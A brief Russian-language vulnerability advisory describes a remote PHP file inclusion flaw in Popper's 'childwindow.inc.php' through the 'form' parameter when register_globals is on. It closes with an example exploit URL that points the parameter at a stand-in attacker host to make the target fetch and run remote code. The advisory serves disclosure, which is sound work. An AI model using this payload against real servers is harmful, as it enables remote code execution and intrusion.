Программа: Popper

Уязвимость позволяет удаленному
пользователю выполнить произвольный php
сценарий на целевой системе. Уязвимость
существует в сценарии ‘childwindow.inc.php’ из-за
недостаточной обработки входных данных в
параметре ‘form’. Удаленный пользователь
может с помощью специально сформированного
URL выполнить произвольный php сценарий на
целевой системе. Уязвимость существует,
если включена опция ‘register_globals’ в
конфигурационном файле php.

Пример:

http://[target]/popper/childwindow.inc. php?form=http://[attacker]/test



Оставить мнение